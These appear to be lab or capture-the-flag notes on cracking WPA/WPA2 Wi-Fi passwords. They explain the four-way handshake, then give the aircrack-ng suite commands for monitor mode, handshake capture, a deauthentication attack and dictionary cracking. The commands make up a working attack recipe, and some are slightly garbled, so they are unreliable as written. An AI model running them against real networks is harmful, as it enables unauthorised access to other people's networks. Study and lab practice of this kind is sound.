The 4 way handshake
- Router sends a challenge: The router (or access point) sends a challenge” to the client, asking it to prove it knows the network’s password without directly sharing it.
- Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
- Router verifies and sends confirmation: If the router sees the client’s response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
- Final check and connection established: The client verifies the router’s response, and if everything matches, they finish setting up the secure connection
Preparation
- iw dev — this will show any wireless devices and their configuration.
- sudo iw dev wlan2 scan — this will scan nearby wifi networks
- sudo ip link set dev wlan2 down — turns device off
- sudo iw dev wlan2 set type monitor — Changes wlan2 to monitor mode
- sudo ip link set dev wlan2 up — turns device back on
Capturing handshake
- sudo airodump-ng wlan2 — start capturing WPA handshakes
- Cancel scan once you locate
- sudo airodump-ng -c 6 –bssid 02:00:00:00:00:00 -w output-file wlan2 — use the data you received from your scan. use the channel and BSSID. The output file is used to crack the password
Launching a Deauth attack
- sudo aireplay -ng -0 1 -a 02:00:00:00:00:00 -c 02:00:00:00:01:00 wlan2
- -0 indicates the deauth attack
- 1 value is the number of deauths to send
- -a indicates the BSSID
- -c BSSID of the client to deauthenticate
Cracking WPA/WPA2 password
- sudo aircrack-ng -a 2 -b 02:00:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
- -a 2 — indicates attack mode
- -b indicates the bssid of the access point
- -w indicates the dictionary list to use for the attack